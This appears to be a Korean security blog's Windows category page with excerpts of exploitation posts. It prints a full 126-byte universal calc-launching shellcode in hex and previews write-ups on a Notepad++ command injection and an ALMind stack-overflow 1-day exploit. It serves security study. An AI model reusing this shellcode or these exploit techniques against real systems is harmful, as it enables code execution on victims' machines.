System/Windows
-
Universal Calc Shellcode (+ExitProcess)System/Windows 2020. 1. 26. 03:59
31 D2 52 68 63 61 6C 63 54 59 52 51 64 8B 72 30 8B 76 0C 8B 76 0C AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 54 1F 24 89 54 24 50 89 7C 24 54 89 74 24 58 0F B7 2C 17 42 42 AD 81 3C 07 57 69 6E 45 75 F0 8B 74 1F 1C 01 FE 03 3C AE FF D7 83 EC 08 8B 54 24 50 8B 7C 24 54 8B 74 24 58 0F B7 2C 17 42 42 AD 81 3C 07 45 78 69 74 75 F0 8B 74 1F 1C 01 FE 03 3C AE FF D7 126Byte
-
Notepad++_v7.6.3 Command InjectionSystem/Windows 2019. 6. 13. 23:37
얼마전에 Windows 기본 프로그램 메모장에서 RCE가 발견됐다는 기사를 본 적이 있었다. 보자마자 드는 생각이 '가능해?'라는 생각이 들었는데, Notepad++ 에서도 취약점이 발견됐다고 한다. 이것도 마찬가지로 처음에 드는 생각이 '가능한가?' 였다.나는 Notepad++를 써본 적이 없어서 기본 메모장처럼 글만 쓰는 아주 베이직한 프로그램일 줄 알았다. 근데 공격벡터가 아예 없는건 아니였다.Search Engine을 설정해서 구글이나 야후등의 검색 서비스 기능도 있었고,각종 플러그인으로 추가적인 기능들을 프로그램에서 사용할 수 있었다. 이번에 발견된 취약점 재현 절차는 다음과 같으며, v7.6.3이하의 버전에서만 유효하다.1. [설정] - [환경 설정] - [Search Engine]에서 사용자..
-
[Windows] ALMind 1day ExploitSystem/Windows 2019. 3. 8. 04:25
이전 글에 이어서 이번에는 Exploit을 하는 과정에 대해서 상세히 정리해보도록 하겠다.이전글>>[ESTSoft] ALMind 1day Analysis[ Mona.py ]mona는 Windows Exploit할 때 굉장히 유용한 툴이다.Linux에서 Pwntools같은 존재라고 생각하면 된다. mona는 외부 스크립트이기 때문에, 다운받아서 로드해줘야 한다.이 과정은 인터넷에 상세하게 있으니 생략하도록 하겠다. 자, 그럼 어떻게 Exploit할 수 있을까?먼저 ALMind의 Mitigation 상황을 확인해보도록 하자 [ Process Hacker ]Process Hacker로 확인해보면, 아무런 보호기법이 적용되어 있지 않다. 그렇다면 가장 단순하고 효과적인 쉘코드를 이용해 보도록 하자 쉘코드는 Po..
-
[Windows] ALMind 1day AnalysisSystem/Windows 2019. 3. 8. 01:13
BoB Windows Software Fuzzing&Exploit 수업에서ESTSoft사의 ALmind를 타겟으로 잡고 Fuzzing&Exploit을 진행했다.그때 내용을 다시 상기시키면서 Exploit과정을 정리해봤다.[Crash파일 & 정리문서][ ALmind Version ]우선 1day Exploit을 진행할 제품의 버전은 1.32버전이다. ALmind Lite버전으로 무료로 제공했을 때 사용하던 제품인 것 같다. [ 취약점 패치 ]1.32버전에는 Stack Overflow 취약점이 존재한다. 1.3 ~ 1.71까지 존재했던 걸 보면 꽤 오랫동안 발견하지 못했나보다. 취약점은 발생하는 이유는 아래와 같다.'.emm'이라는 알마인드 확장자에서 파일이름의 길이값을 관리하는 헤더부분을 제대로 체크하지 ..